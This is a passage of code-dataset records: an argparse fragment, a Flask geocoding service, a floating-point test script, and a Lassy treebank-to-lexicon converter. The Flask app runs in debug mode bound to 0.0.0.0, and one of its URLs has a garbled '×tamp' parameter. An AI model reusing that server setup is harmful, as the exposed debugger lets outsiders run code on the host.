parser.add_argument('--warn-missing-dependencies',\n help=\"Issue warnings on missing software packages\",\n action='store_true', default=False)\n\ndef evalute(args: Namespace) -> None:\n \"\"\"Evaluate command line arguments for configuring the toolbox.\n\n Parameters\n ----------\n args: Namespace\n An `Namespace` from parsing the command line\n arguments with `parser.parse_args()`.\n \"\"\"\n\n if args.warn_missing_dependencies:\n config.warn_missing_dependencies = True\n","sub_path":"dltb/argparse.py","file_name":"argparse.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"55159912","text":"import os\nimport json\nfrom flask import Flask, request, make_response, jsonify\nfrom requests import get, status_codes\n\napp = Flask(__name__)\n\n\nKEY = os.environ['MAPS_KEY']\nBASE_URL = 'https://maps.googleapis.com/maps/api'\n\n@app.route('/coords', methods=['GET'])\ndef get_coordinates():\n zip_code_param = 'zip_code'\n try: \n zip_code = request.args.get(zip_code_param)\n coords = get(\n f'{BASE_URL}/geocode/json?address={zip_code}&key={KEY}').json()['results'][0]['geometry']['location']\n \n lat, lng = float(coords['lat']), float(coords['lng'])\n return jsonify({\"latitude\": lat, \"longitude\" : lng})\n except:\n return make_response('zip_code is a required query parameter', 400)\n\n\n@app.route('/coords/validate', methods=['GET'])\ndef validate_coords():\n latitude_param, longitude_param = 'latitude', 'longitude'\n try:\n latitude, longitude = float(request.args.get(latitude_param)), float(request.args.get(longitude_param))\n except:\n return make_response('Must provide the \"{:s}\" and \"{:s}\" query params as float values\\n'.format(latitude_param, longitude_param), 400) \n res = get(\n f'{BASE_URL}/timezone/json?location={latitude},{longitude}×tamp=1458000000&key={KEY}')\n if (res.status_code == 200): return make_response('Valid coordinates', 200)\n else: return make_response('Invalid coordinates', 400)\n\napp.run(debug=True, 
host='0.0.0.0', port=int(os.environ['PORT']))\n","sub_path":"maps-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51746349","text":"from os import path\n\ndef isRoundingDifference(a,b):\n foundDiff = False\n for i in range(len(a)):\n if a[i] == b[i] and not foundDiff:\n continue\n foundDiff = True\n if foundDiff and a[i] == b[i]:\n return False\n \n return True\n\n\nscriptPath = path.abspath(__file__)\nscriptDirPath = path.split(scriptPath)[0]\nconfigPath = path.split(scriptDirPath)[0]\n\nsourceFile = open(f'{configPath}/InputFiles/fpValues.txt', 'r')\nresultsFile = open(f'{configPath}/OutputFiles/subResults.txt', 'r')\nanswerKey = open(f'{configPath}/OutputFiles/subAnswerKey.txt', 'r')\ntestResults = open(f'{configPath}/OutputFiles/fpSubResults.txt', 'w')\n\nresults = resultsFile.readlines()\nanswers = answerKey.readlines()\n\nsuccessCount = 0\nfailCount = 0\nfor i in range(1,len(results)+1):\n a = sourceFile.readline()\n b = sourceFile.readline()\n\n result = results[i-1][0:32]\n answer = answers[i-1][0:32]\n\n if result != answer:\n if isRoundingDifference(answer, result):\n print(f'{i}: Rounding error', file=testResults)\n successCount += 1\n else:\n if failCount < 25:\n print(\"Case\", i)\n print(a[0:32], \" +\\n\", b[0:32], ' =', sep = '')\n print(f'{answer} but got\\n{result}')\n print(f'{i}: Fail',file=testResults)\n failCount += 1\n \n #print('Failed on test', i+1)\n else:\n print(f'{i}: Success',file=testResults)\n successCount += 1\n #print('Success on test', i+1)\n\nprint(f'Success: {successCount}')\nprint(f'Fail: {failCount}')\n\nsourceFile.close()\nresultsFile.close()\nanswerKey.close()\ntestResults.close()","sub_path":"OldSim/Simulation.configuration/scripts/fpSubTest.py","file_name":"fpSubTest.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"188007852","text":"import os\nimport xml.etree.cElementTree as ET\nfrom glob import glob\nfrom copy import deepcopy\nimport graphviz\nfrom pprint import pprint as print\n\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.transforms import Compose\n\nfrom itertools import groupby, chain\nfrom collections import Counter\n\nfrom WordType import *\n\nfrom warnings import warn\n\n\nclass Lassy(Dataset):\n \"\"\"\n Lassy dataset\n \"\"\"\n\n def __init__(self, root_dir='/home/kokos/Documents/Projects/LassySmall 4.0', treebank_dir='/Treebank',\n transform=None, ignore=True):\n \"\"\"\n\n :param root_dir:\n :param treebank_dir:\n :param transform:\n \"\"\"\n\n if os.path.isdir(root_dir) and os.path.isdir(root_dir+treebank_dir):\n self.root_dir = root_dir # might be useful to store meta information\n self.treebank_dir = root_dir + treebank_dir\n else:\n raise ValueError('%s and %s must be existing directories' % (root_dir, treebank_dir))\n\n ignored = []\n if ignore:\n try:\n with open('ignored.txt', 'r') as f:\n ignored = f.readlines()\n ignored = list(map(lambda x: x[0:-1], ignored))\n except FileNotFoundError:\n pass\n print('Ignoring {} samples..'.format(len(ignored)))\n\n self.filelist = [y for x in os.walk(self.treebank_dir) for y in glob(os.path.join(x[0], '*.[xX][mM][lL]'))\n if y not in ignored]\n self.transform = transform\n\n print('Dataset constructed with {} samples.'.format(len(self.filelist)))\n\n def __len__(self):\n \"\"\"\n :return:\n \"\"\"\n return len(self.filelist)\n\n def 
__getitem__(self, id):\n \"\"\"\n :param file:\n :return: id (INT), FILENAME (STR), PARSE (XMLTREE)\n \"\"\"\n\n if type(id) == int:\n file = self.filelist[id]\n elif type(id) == str:\n file = id\n else:\n raise TypeError('file argument has to be int or str')\n\n parse = ET.parse(file)\n parse.getroot().set('type', 'Tree')\n\n sample = (id, file, parse)\n\n if self.transform:\n return self.transform(sample)\n\n return sample\n\n @staticmethod\n def extract_nodes(xtree):\n \"\"\"\n A simple iterator over an xml parse that returns the parse tree's nodes. This is necessary as the default ET\n iterator does not provide parent or depth info.\n :param xtree:\n :return (child_node, parent_node, depth)\n \"\"\"\n\n root = xtree.getroot().find('node')\n parents = [root]\n\n yield (root, None)\n while parents:\n children = []\n for parent in parents:\n for child in parent.findall('node'):\n children.append(child)\n yield (child, parent)\n parents = children\n\n\n @staticmethod\n def find_main_coindex(xtree):\n \"\"\"\n Takes an ElementTree representing a parse tree, finds out nodes corresponding to the same lexical unit, and\n selects a single node to act as the \"main\" node (the one to collapse dependencies to, when removing its\n cross-references).\n :param cElementTree xtree: the ElementTree to operate on\n :return dict all_coind a dictionary mapping each co-indexing identifier to a list of nodes sharing it,\n dict main_coind a dictionary mapping each co-indexing identifier to the main node of the group:\n\n \"\"\"\n coindexed = list(filter(lambda x: 'index' in x.attrib.keys(), xtree.iter('node')))\n if not coindexed:\n return dict(), dict()\n all_coind = {i: [node for node in group] for i, group in\n groupby(sorted(coindexed, key=lambda x: x.attrib['index']), key=lambda x: x.attrib['index'])}\n # find the 'main' child for each set of siblings\n main_coind = {i: list(filter(lambda x: 'cat' in x.attrib or 'word' in x.attrib, nodes))[0]\n for i, nodes in all_coind.items()}\n return all_coind, main_coind\n\n @staticmethod\n def tree_to_dag(xtree, inline=False):\n \"\"\"\n Takes an ElementTree representing a parse tree, possibly containing duplicate nodes (that is, nodes that\n correspond to the same lexical unit but with a different identifier to preserve the tree format). 
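For example, a co-indexed node (say, a subject shared between a main clause\n        and an embedded verb) appears as two nodes in the tree; after this step a\n        single node remains, carrying one entry per parent in its 'rel' dictionary.\n        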
Removes\n duplicate nodes by constructing new dependency links between cross-references (moving to a DAG format), and\n returns the resulting ElementTree.\n :param xtree: the ElementTree to process\n :param inline: whether to apply the changes to the original tree or a copy of it\n :return xtree: the modified ElementTree\n \"\"\"\n if not inline:\n xtree = deepcopy(xtree)\n\n nodes = list(Lassy.extract_nodes(xtree))\n\n _, main_coind = Lassy.find_main_coindex(xtree)\n\n for node, parent in nodes[1:]:\n if node in main_coind.values():\n node.attrib['rel'] = {parent.attrib['id']: [node.attrib['rel'], 'primary']}\n\n for node, parent in nodes[1:]:\n if type(node.attrib['rel']) == str:\n if 'index' in node.attrib.keys():\n\n main_coind[node.attrib['index']].attrib['rel'] = {parent.attrib['id']: [node.attrib['rel'],\n 'secondary'],\n **main_coind[node.attrib['index']].attrib['rel']}\n parent.remove(node)\n else:\n node.attrib['rel'] = {parent.attrib['id']: node.attrib['rel']}\n return xtree\n\n\nclass Decompose:\n def __init__(self, type_dict=None, unify=False, return_lists=True, text_pipeline=lambda x: x.lower(),\n separation_symbol='↔', visualize=False):\n # type_dict: POS → Type\n if not type_dict:\n # todo: instantiate the type dict with Types and refactor all downwards call to allow for complex types\n self.type_dict = {'adj': 'ADJ', 'adv': 'ADV', 'advp': 'ADV', 'ahi': 'AHI', 'ap': 'AP', 'comp': 'COMP',\n 'comparative': 'COMPARATIVE', 'conj': 'CONJ', 'cp': 'CP', 'det': 'DET', 'detp': 'DET',\n 'du': 'DU', 'fixed': 'FIXED', 'inf': 'INF', 'mwu': 'MWU', 'name': 'NP', 'noun': 'NP',\n 'np': 'NP', 'num': 'NP', 'oti': 'OTI', 'part': 'PART', 'pp': 'PP', 'ppart': 'PPART',\n 'ppres': 'PPRES', 'prefix': 'PREFIX', 'prep': 'PREP', 'pron': 'NP', 'punct': 'PUNCT',\n 'rel': 'REL', 'smain': 'S', 'ssub': 'S', 'sv1': 'S', 'svan': 'SVAN',\n 'tag': 'TAG', 'ti': 'TI', 'top': 'TOP', 'verb': 'VERB', 'vg': 'VG', 'whq': 'WHQ',\n 'whrel': 'WHREL', 'whsub': 'WHSUB'}\n # convert to Types\n self.type_dict = {k: AtomicType(v) for k, v in self.type_dict.items()}\n\n # Type conventions (richard)\n # # todo: need to change the direction of headedness before applying\n # self.type_dict['det'] = WordType([('NP', 'det')], 'NP')\n # self.type_dict['adj'] = WordType([('NP', 'mod')], 'NP')\n # self.type_dict['ap'] = WordType([('NP', 'mod')], 'NP')\n # self.type_dict['adv'] = WordType([('S', 'mod')], 'S')\n # self.type_dict['advp'] = WordType([('S', 'mod')], 'S')\n self.unify = unify # whether to return a single lexicon from a sentence, or a lexicon for each subunit\n self.return_lists = return_lists # whether to convert lexicons to word and type sequences\n self.text_pipeline = text_pipeline # the function applied on the text before adding a word to the lexicon\n self.separation_symbol = separation_symbol # the separation symbol between a node's text content and its id\n # the function applied to convert the processed text of a node into a dictionary key\n self.get_key = lambda node: self.text_pipeline(node.attrib['word']) + self.separation_symbol + node.attrib['id']\n self.head_candidates = ('hd', 'rhd', 'whd', 'cmp', 'crd', 'dlink')\n self.visualize = visualize\n\n @staticmethod\n def is_leaf(node):\n \"\"\"\n Returns True if a node is a leaf in the parse tree, False otherwise.\n :param node: the node to decide\n :return True | False:\n \"\"\"\n return True if 'word' in node.attrib.keys() else False\n\n def majority_vote(self, node, grouped):\n \"\"\"\n Returns the majority voting of a node's children base types.\n :param 
node:\n :param grouped:\n :return:\n \"\"\"\n sibling_types = [self.get_type_key(n[0], grouped) for n in grouped[node]]\n votes = {c: len([x for x in sibling_types if x == c]) for c in set(sibling_types)}\n votes = sorted(votes, key=lambda x: -votes[x])\n return votes[0]\n\n def get_type_key(self, node, grouped):\n \"\"\"\n This will return the pos/cat of a node, performing majority vote on conjunctions\n :param node:\n :param grouped:\n :return:\n \"\"\"\n if 'cat' in node.attrib.keys():\n if node.attrib['cat'] == 'conj':\n return self.majority_vote(node, grouped)\n return node.attrib['cat']\n return node.attrib['pos']\n\n def get_plain_type(self, node, grouped, rel=None):\n \"\"\"\n This will return the plain (i.e. ignoring context) of a node, based on the type_dict of the class\n :param node:\n :param grouped:\n :return:\n \"\"\"\n if rel is not None and self.get_rel(rel) == 'mod':\n return AtomicType('MOD')\n if 'cat' in node.attrib.keys():\n if node.attrib['cat'] == 'conj':\n return self.type_dict[self.majority_vote(node, grouped)]\n return self.type_dict[node.attrib['cat']]\n return self.type_dict[node.attrib['pos']]\n\n @staticmethod\n def group_by_parent(xtree):\n \"\"\"\n Converts the representation from ETree to a dictionary mapping parents to their children\n :param ElementTree xtree:\n :return dict grouped: a dictionary mapping each node to its children\n \"\"\"\n nodes = list(xtree.iter('node'))\n grouped = []\n for node in nodes:\n if type(node.attrib['rel']) == str:\n grouped.append([node, -1, 'top'])\n else:\n for parent, rel in node.attrib['rel'].items():\n grouped.append([node, parent, rel])\n grouped = sorted(grouped, key=lambda x: int(x[1]))\n grouped = groupby(grouped, key=lambda x: int(x[1]))\n grouped = {k: [[v[0], v[2]] for v in V] for k, V in grouped}\n grouped = dict(map(lambda x: [x[0], x[1]], grouped.items()))\n\n newdict = dict()\n\n for key in grouped.keys():\n if key == -1:\n newdict[None] = grouped[key]\n continue\n newkey = list(filter(lambda x: x.attrib['id'] == str(key), nodes))[0]\n newdict[newkey] = grouped[key]\n return newdict\n\n @staticmethod\n def split_dag(grouped, cats_to_remove=('du',), rels_to_remove=('dp', 'sat', 'nucl', 'tag', '--', 'top')):\n \"\"\"\n Takes a dictionary possibly containing headless structures, and returns multiple dictionaries that don't.\n Essentially splits a parse DAG into a set of disjoint DAGs.\n :param grouped:\n :param cats_to_remove:\n :param rels_to_remove:\n :return:\n \"\"\"\n keys_to_remove = list()\n\n for key in grouped.keys():\n if key is not None:\n if 'cat' in key.attrib.keys():\n if key.attrib['cat'] in cats_to_remove:\n keys_to_remove.append(key)\n\n for key in keys_to_remove:\n del grouped[key] # here we delete the node from being a parent (outgoing edges)\n\n # here we remove children\n for key in grouped.keys():\n children_to_remove = list()\n for c, r in grouped[key]:\n if c in keys_to_remove:\n # the child was a cut-off parent; remove the incoming edge\n children_to_remove.append([c, r])\n if key is not None:\n del c.attrib['rel'][key.attrib['id']]\n elif r in rels_to_remove:\n # the child has a 'bad' incoming edge; remove it\n children_to_remove.append([c, r])\n if key is not None:\n del c.attrib['rel'][key.attrib['id']]\n elif (len(c.attrib['rel'].values()) and\n all(map(lambda x: Decompose.get_rel(x) == 'mod', c.attrib['rel'].values()))):\n # explicit treatment of modifiers\n children_to_remove.append([c, r])\n if key is not None:\n del c.attrib['rel'][key.attrib['id']]\n\n for c in 
children_to_remove:\n grouped[key].remove(c)\n\n # check the parse tree for parent nodes with zero children\n empty_keys = [key for key in grouped.keys() if not grouped[key]]\n while len(empty_keys):\n for key in empty_keys:\n del grouped[key]\n for key in grouped.keys():\n for c, r in grouped[key]:\n if c in empty_keys:\n grouped[key].remove([c, r])\n if key is not None:\n del c.attrib['rel'][key.attrib['id']]\n empty_keys = [key for key in grouped.keys() if not grouped[key]]\n\n return grouped\n\n @staticmethod\n def get_disconnected(grouped):\n \"\"\"\n Takes a dictionary, possibly containing headless structures. Returns all nodes that are parents without being\n children of any other node.\n :param grouped:\n :return:\n \"\"\"\n all_keys = set(grouped.keys()) # all parents\n all_children = set([x[0] for k in all_keys for x in grouped[k]]) # all children\n # sanity check: make sure that {all_children} - {all_parents} == all_leaves\n assert(all(map(lambda x: Decompose.is_leaf(x), all_children.difference(all_keys))))\n return all_keys.difference(all_children)\n\n @staticmethod\n def abstract_object_to_subject(grouped):\n \"\"\"\n Takes a dictionary containing abstract objects/subjects and applies a series of conventions to re-assign the\n main objects/subjects.\n :param grouped:\n :return:\n \"\"\"\n\n # todo: write this neatly\n for main_parent in grouped.keys():\n\n parent = main_parent\n\n if main_parent.attrib['cat'] not in ('ssub', 'smain', 'sv1'):\n continue\n real_so = list(filter(lambda x: (x[1] == ['su', 'secondary'] or x[1] == ['obj1', 'secondary']),\n [x for x in grouped[main_parent]]))\n if not real_so:\n continue\n\n assert isinstance(real_so[0][1], list)\n parent_dep = real_so[0][1][0]\n real_so = real_so[0][0]\n\n # om te construction -- go one level lower\n ti = list(filter(lambda x: x[0].attrib['cat'] == 'ti',\n [x for x in grouped[main_parent] if 'cat' in x[0].attrib]))\n if ti:\n parent = ti[0][0]\n\n ppart = list(filter(lambda x: (x[0].attrib['cat'] == 'ppart' or x[0].attrib['cat'] == 'inf'),\n [x for x in grouped[parent] if 'cat' in x[0].attrib]))\n if not ppart:\n continue\n ppart = ppart[0][0]\n abstract_so = list(filter(lambda x: (x[1] == ['obj1', 'primary'] or x[1] == ['su', 'primary']\n or x[1] == ['sup', 'primary']) and\n (x[0].attrib['index'] == real_so.attrib['index']),\n [x for x in grouped[ppart] if 'index' in x[0].attrib]))\n\n # chained inf / ppart construction\n if not abstract_so:\n ppart = list(filter(lambda x: (x[0].attrib['cat'] == 'ppart' or x[0].attrib['cat'] == 'inf'),\n [x for x in grouped[ppart] if 'cat' in x[0].attrib]))\n if ppart:\n ppart = ppart[0][0]\n abstract_so = list(filter(lambda x: (x[1] == ['obj1', 'primary'] or x[1] == ['su', 'primary']\n or x[1] == ['sup', 'primary']) and\n (x[0].attrib['index'] == real_so.attrib['index']),\n [x for x in grouped[ppart] if 'index' in x[0].attrib]))\n if not abstract_so:\n continue\n\n rel = abstract_so[0][1][0]\n abstract_so = abstract_so[0][0]\n # # # Dictionary changes\n # remove the abstract real_so / object from being a child of the ppart/inf\n grouped[ppart].remove([abstract_so, [rel, 'primary']])\n # remove the abstract so from being a child of the ssub with a secondary label\n grouped[main_parent].remove([abstract_so, [parent_dep, 'secondary']])\n # add it again with a primary label\n grouped[main_parent].append([abstract_so, [parent_dep, 'primary']])\n # # # Internal node changes (for consistency) # todo redundant\n # remove the primary edge property from abstract object\n del 
abstract_so.attrib['rel'][ppart.attrib['id']]\n # convert the secondary edge to primary internally\n abstract_so.attrib['rel'][main_parent.attrib['id']] = ['su', 'primary']\n return grouped\n\n @staticmethod\n def remove_abstract_so(grouped, candidates=('su', 'obj', 'obj1', 'obj2', 'sup')):\n \"\"\"\n Takes a dictionary containing abstract subjects/objects and removes them. The main subject/object must have\n been properly assigned before.\n :param grouped:\n :return:\n \"\"\"\n for parent in grouped.keys():\n if parent.attrib['cat'] != 'ppart' and parent.attrib['cat'] != 'inf':\n # this is a proper secondary edge (non-abstract) and should not be removed\n continue\n for child, rel in grouped[parent]:\n if not isinstance(rel, list):\n # ignore non-coindexed\n continue\n red_rel = Decompose.get_rel(rel)\n if red_rel not in candidates:\n continue\n if rel[1] == 'secondary':\n # # # Dictionary changes\n # remove the abstract s/o from being a child of the ppart/inf\n grouped[parent].remove([child, rel])\n # # # Internal node changes (for consistency) # todo redundant\n del child.attrib['rel'][parent.attrib['id']]\n else:\n # Trying to remove main coindex\n if 'index' in child.keys():\n # todo?\n continue\n # raise ValueError('Found primary object between {} and {}'.format(parent.attrib['id'],\n # child.attrib['id']))\n #ToGraphViz()(grouped, output='abc')\n\n return grouped\n\n @staticmethod\n def order_siblings(siblings, exclude=None):\n \"\"\"\n Sorts a list of sibling nodes. Sorting is done on the basis of (span: start, span:end, original id)\n :param siblings:\n :param exclude:\n :return:\n \"\"\"\n if exclude is not None:\n siblings = list(filter(lambda x: x[0] != exclude, siblings))\n return sorted(siblings,\n key=lambda x: tuple(map(int, (x[0].attrib['begin'], x[0].attrib['end'], x[0].attrib['id']))))\n\n def collapse_mwu(self, grouped):\n \"\"\"\n Takes a dictionary, possibly containing multi-word units, and collapses these together. 
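For example, a proper name that the parser split over several leaves becomes\n        one leaf whose 'word' attribute is the space-joined text of its parts, in\n        sentence order.\n        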
The type of the\n collapsed node is inferred by majority voting on its children.\n :param grouped:\n :param relabel:\n :return:\n \"\"\"\n to_remove = []\n\n # find all mwu parents\n for key in grouped.keys():\n if key is not None:\n if 'cat' in key.attrib.keys():\n if key.attrib['cat'] == 'mwu':\n nodes = Decompose.order_siblings(grouped[key])\n collapsed_text = ''.join([x[0].attrib['word'] + ' ' for x in nodes])\n\n key.attrib['word'] = collapsed_text[0:-1] # update the parent text\n key.attrib['cat'] = self.majority_vote(key, grouped)\n to_remove.append(key)\n\n # parent is not a parent anymore (since no children are inherited)\n for key in to_remove:\n del (grouped[key])\n return grouped\n\n def choose_head(self, children_rels):\n \"\"\"\n Takes a list of siblings and selects their head.\n :param children_rels: a list of [node, rel] lists\n :return:\n if a head is found, return the head and the rel\n if structure is headless, return None, None\n if unspecified case, raise ValueError\n \"\"\"\n for i, (candidate, rel) in enumerate(children_rels):\n if Decompose.get_rel(rel) in self.head_candidates:\n return candidate, rel\n return None, None\n\n @staticmethod\n def get_rel(rel):\n return rel[0] if isinstance(rel, list) else rel\n\n @staticmethod\n def collapse_single_non_terminals(grouped, depth=0):\n # list of nodes containing a single child\n intermediate_nodes = [k for k in grouped.keys() if len(grouped[k]) == 1]\n if not intermediate_nodes:\n return grouped\n\n # for each intermediate node\n for k in intermediate_nodes:\n # find its only child\n points_to, old_rel = grouped[k][0]\n # for each other node\n for kk in grouped.keys():\n # find its dependencies pointing to the intermediate node\n rels = [r for n, r in grouped[kk] if n == k]\n if not rels:\n continue\n if len(rels) > 1:\n ToGraphViz()(grouped)\n raise ValueError('Many rels @ non-terminal node {}.'.format(k.attrib['id']))\n new_rel = rels[0]\n grouped[kk].remove([k, new_rel])\n new_rel = new_rel[0] if isinstance(new_rel, list) else new_rel\n if isinstance(old_rel, list):\n grouped[kk].append([points_to, [rels[0], old_rel[1]]])\n points_to.attrib['rel'][kk] = [rels[0], old_rel[1]]\n else:\n grouped[kk].append([points_to, new_rel])\n points_to.attrib['rel'][kk] = new_rel\n del points_to.attrib['rel'][k.attrib['id']]\n for k in intermediate_nodes:\n del(grouped[k])\n return Decompose.collapse_single_non_terminals(grouped, depth=depth+1)\n\n def recursive_assignment(self, current, grouped, top_type, lexicon):\n \"\"\"\n Takes a node, a dictionary, a word type from the above subtree and a lexicon. 
Updates the lexicon with inferred\n types for this node's children and iterates downwards.\n :param current:\n :param grouped:\n :param top_type:\n :param lexicon:\n :return:\n \"\"\"\n def is_gap(node):\n # this node is involved in some sort of magic trickery if it has more than one incoming edges\n all_incoming_edges = list(map(self.get_rel, node.attrib['rel'].values()))\n if len(all_incoming_edges) > 1:\n num_heads = list(filter(lambda x: x in self.head_candidates, all_incoming_edges))\n if num_heads and len(num_heads) != len(all_incoming_edges):\n return True\n else:\n return False\n\n # find all of the node's siblings\n siblings = grouped[current]\n # pick a head\n headchild, headrel = self.choose_head(siblings)\n\n # if no type given from above, assign one now (no nested types)\n if top_type is None:\n top_type = self.get_plain_type(current, grouped)\n\n # pose some linear order and exclude the picked head\n siblings = Decompose.order_siblings(siblings, exclude=headchild)\n\n if headchild is not None:\n # pick all the arguments\n arglist = [[self.get_plain_type(sib, grouped, rel), self.get_rel(rel)] for sib, rel in siblings]\n # convert the arglist to coloured arglist\n if arglist:\n argtypes, argdeps = list(zip(*arglist))\n else:\n\n # siblings must have been removed by processing, so chain of non-terminal nodes with single child\n # ending with a single word\n if not self.is_leaf(headchild):\n # call self having made no adjustments to top_type (simply propagate it down)\n # self.recursive_assignment(headchild, grouped, top_type, lexicon)\n pass\n elif self.get_key(headchild) not in lexicon.keys():\n lexicon[self.get_key(headchild)] = top_type\n elif lexicon[self.get_key(headchild)] != top_type:\n raise KeyError('[No siblings] Trying to assign {} to node {}, when already assigned {}. 
'\n 'Now iterating from parent {}.'.format(top_type, headchild.attrib['id'],\n lexicon[self.get_key(headchild)],\n current.attrib['id']))\n return lexicon\n\n # classify the headchild\n gap = is_gap(headchild)\n\n # case management\n if not gap:\n # standard type assignment\n headtype = ColoredType(arguments=argtypes, result=top_type, colors=argdeps) # /W EXCHANGE\n else:\n # case of gap: project self within arglist\n\n # assert that there is one argument to project into\n if len(argtypes) != 1:\n print(argtypes)\n ToGraphViz()(grouped)\n raise NotImplementedError('Case of non-terminal gap with many arguments {} {}.'.\n format(headchild.attrib['id'], current.attrib['id']))\n\n # find the dependency which does not match the head\n internal_edge = [self.get_rel(r) for r in headchild.attrib['rel'].values()\n if self.get_rel(r) != self.get_rel(headrel)]\n\n # assert that there is just one (class) of those\n if len(set(internal_edge)) == 1:\n # construct the internal type (which includes a hypothesis for the gap)\n internal_type = ColoredType(arguments=(self.get_plain_type(headchild, grouped, internal_edge),),\n result=argtypes[0], colors=(internal_edge[0],))\n # construct the external type (which takes the internal type back to the top type)\n headtype = ColoredType(arguments=(internal_type,), result=top_type, colors=(argdeps[0],))\n else:\n assert len(argdeps) == 1 # not even sure why but this is necessary\n types = []\n for it in set(internal_edge):\n internal_type = ColoredType(arguments=(self.get_plain_type(headchild, grouped, it),),\n result=argtypes[0], colors=(it,))\n types.append(internal_type)\n # types.append(ColoredType(arguments=(internal_type,), result=top_type, colors=(argdeps[0],)))\n headtype = ColoredType(arguments=(CombinatorType(tuple(types), combinator='&'),),\n result=top_type, colors=(argdeps[0],))\n\n if Decompose.is_leaf(headchild):\n # assign the type to the lexicon\n if self.get_key(headchild) in lexicon.keys():\n old_value = lexicon[self.get_key(headchild)]\n if old_value != headtype:\n headtype = CombinatorType((headtype, old_value), combinator='&')\n lexicon[self.get_key(headchild)] = headtype\n else:\n # .. or iterate down\n self.recursive_assignment(headchild, grouped, headtype, lexicon)\n\n # now deal with the siblings\n for sib, rel in siblings:\n if not is_gap(sib):\n # simple type\n sib_type = self.get_plain_type(sib, grouped, rel)\n if Decompose.is_leaf(sib):\n # assign to lexicon\n lexicon[self.get_key(sib)] = sib_type\n else:\n # .. 
or iterate down\n self.recursive_assignment(sib, grouped, None, lexicon)\n\n def lexicon_to_list(self, sublex, grouped, to_sequences=True):\n \"\"\"\n Take a sublexicon {word : WordType}, partially mapping leaves from the grouped dictionary to types, and convert\n it to a (word, WordType) list that respects the original linear order of the sentence\n :param sublex:\n :param grouped:\n :param to_sequences: if True, return a list of words and a corresponding list of their types\n :return:\n \"\"\"\n # todo: sorting by keys properly\n\n all_leaves = set(list(filter(lambda x: 'word' in x.attrib.keys(),\n map(lambda x: x[0], chain.from_iterable(grouped.values())))))\n\n all_leaves = sorted(all_leaves,\n key=lambda x: tuple(map(int, (x.attrib['begin'], x.attrib['end'], x.attrib['id']))))\n\n # mapping from linear order to dictionary keys\n enum = {i: self.get_key(l) for i, l in enumerate(all_leaves)}\n\n ret = [(enum[i].split(self.separation_symbol)[0], sublex[enum[i]])\n for i in range(len(all_leaves)) if enum[i] in sublex.keys()]\n if to_sequences:\n return list(zip(*ret))\n return ret\n\n def __call__(self, grouped):\n if self.visualize:\n ToGraphViz()(grouped)\n top_nodes = Decompose.get_disconnected(grouped)\n\n top_node_types = map(lambda x: self.get_plain_type(x, grouped), top_nodes)\n\n if self.unify:\n # init lexicon here\n lexicon = dict()\n\n # recursively iterate from each top node\n for top_node in top_nodes:\n self.recursive_assignment(top_node, grouped, None, lexicon)\n if self.return_lists:\n return Decompose.lexicon_to_list(lexicon, grouped) # return the dict transformation\n return lexicon # or return the dict\n\n else:\n # one dict per disjoint sequence\n dicts = [dict() for _ in top_nodes]\n for i, top_node in enumerate(top_nodes):\n # recursively iterate each\n self.recursive_assignment(top_node, grouped, None, dicts[i])\n\n if self.return_lists:\n return list(map(lambda x: self.lexicon_to_list(x, grouped), dicts)) # return the dict transformation\n return dicts # or return the dicts\n\n\ndef main(ignore=False, return_lists=False, viz=False):\n # a non-processed dataset for comparisons\n L0 = Lassy(ignore=ignore)\n\n # a processed dataset that yields a lexicon\n decomposer = Decompose(return_lists=return_lists, visualize=viz)\n lexicalizer = Compose([lambda x: [x[0], x[2]], # keep only index and parse tree\n lambda x: [x[0], Lassy.tree_to_dag(x[1])], # convert to DAG\n lambda x: [x[0], Decompose.group_by_parent(x[1])], # convert to dict format\n lambda x: [x[0], decomposer.collapse_mwu(x[1])], # remove mwus\n lambda x: [x[0], Decompose.split_dag(x[1], # split into disjoint trees if needed\n cats_to_remove=('du',),\n rels_to_remove=('dp', 'sat', 'nucl', 'tag', '--',\n 'top', 'mod', 'predm',))],\n lambda x: [x[0], Decompose.abstract_object_to_subject(x[1])], # relabel abstract so's\n lambda x: [x[0], Decompose.remove_abstract_so(x[1])], # remove abstract so's\n lambda x: [x[0], Decompose.collapse_single_non_terminals(x[1])],\n lambda x: [x[1], decomposer(x[1])], # decompose into a lexicon\n ])\n L = Lassy(transform=lexicalizer, ignore=ignore)\n #\n X, Y = [], []\n for i in range(len(L)):\n if i == 29897: continue\n l = L[i][1]\n X.extend([x[0] for x in l])\n Y.extend([x[1] for x in l])\n return X, Y\n\n return L0, L, ToGraphViz()\n\n\nclass ToGraphViz:\n def __init__(self, to_show=('id', 'word', 'pos', 'cat', 'index')):\n self.to_show = to_show\n\n def construct_node_label(self, child):\n \"\"\"\n :param child:\n :return:\n \"\"\"\n label = ''\n for key in self.to_show:\n if 
key != 'span':\n try:\n label += child[key] + '\\n'\n except KeyError:\n pass\n else:\n label += child['begin'] + '-' + child['end'] + '\\n'\n return label\n\n def construct_edge_label(self, rel):\n return ' '.join(rel) if isinstance(rel, list) else rel\n\n def get_edge_style(self, rel):\n return 'dashed' if isinstance(rel, list) and rel[1] == 'secondary' else ''\n\n def xml_to_gv(self, xtree):\n nodes = list(Lassy.extract_nodes(xtree)) # a list of triples\n graph = graphviz.Digraph()\n\n graph.node('title', label=xtree.findtext('sentence'), shape='none')\n graph.node(nodes[0][0].attrib['id'], label='ROOT')\n graph.edge('title', nodes[0][0].attrib['id'], style='invis')\n\n for child, parent in nodes[1:]:\n node_label = self.construct_node_label(child.attrib)\n graph.node(child.attrib['id'], label=node_label)\n\n if type(child.attrib['rel']) == str:\n graph.edge(parent.attrib['id'], child.attrib['id'], label=child.attrib['rel'])\n else:\n for parent_id, dependency in child.attrib['rel'].items():\n graph.edge(parent_id, child.attrib['id'], label=self.construct_edge_label(dependency))\n\n return graph\n\n def grouped_to_gv(self, grouped):\n graph = graphviz.Digraph()\n reduced_sentence = ' '.join([x.attrib['word'] for x in sorted(\n set(grouped.keys()).union(set([y[0] for x in grouped.values() for y in x])),\n key=lambda x: (int(x.attrib['begin']), int(x.attrib['end']), int(x.attrib['id']))) if 'word' in x.attrib])\n\n graph.node('title', label=reduced_sentence, shape='none')\n\n for parent in grouped.keys():\n node_label = 